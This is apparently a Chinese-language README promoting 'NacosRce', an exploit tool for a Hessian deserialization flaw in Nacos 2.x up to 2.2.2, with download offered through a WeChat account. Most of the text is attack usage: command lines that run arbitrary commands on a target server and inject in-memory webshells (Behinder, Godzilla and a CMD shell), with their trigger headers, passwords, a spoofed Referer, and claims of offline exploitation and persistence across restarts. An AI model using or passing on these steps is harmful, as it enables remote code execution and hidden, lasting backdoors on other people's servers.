项目简介
刨洞安全@凉风 师傅写的一个 Nacos Hessian 反序列化漏洞利用工具,目前已更新到v0.5,欢迎Star!
关注【Hack分享吧】公众号,回复关键字【230706】获取下载链接
使用方法
1. 自动注入内存马并执行命令 java -jar NacosRce.jar Url Jraft端口 "Command"
java -jar NacosRce.jar http://192.168.90.1:8848 7848 "whoami"
2. 只注入内存马
java -jar NacosRce.jar http://192.168.90.1:8848 7848 memshell
一、冰蝎内存马:
需要设置请求头x-client-data:rebeyond
设置Referer:https://www.google.com/
路径随意
密码rebeyond
二、哥斯拉内存马:
需要设置请求头x-client-data:godzilla
设置Referer:https://www.google.com/
路径随意
密码是pass和key
三、CMD内存马:
需要设置请求头x-client-data:cmd
设置Referer:https://www.google.com/
请求头cmd:要执行的命令
v0.5版本实现了
不出网漏洞利用
可多次发起漏洞利用
同时注入冰蝎/哥斯拉/CMD内存马
内存马对nacos多版本进行了兼容
修复windows的bug
tips:
请用jdk1.8
适用于Nacos 2.x <= 2.2.2
非集群的也能打哦
此内存马重启nacos依然存活
注意事项
Windows如用下面的方式执行,注入内存马时会在以下目录生成两个临时文件
java -jar NacosRce.jar http://192.168.90.1:8848 7848 "whoami" windows
C:\Windows\Temp\nacos_data_temp
C:\Windows\Temp\nacos_data_temp.class
如果没有在最后加windows,临时文件会在以下目录,所以权限足够的话,不指定windows也能打成功,没打成功也许是因为没权限操作C盘或其他原因
/tmp/nacos_data_temp
/tmp/nacos_data_temp.class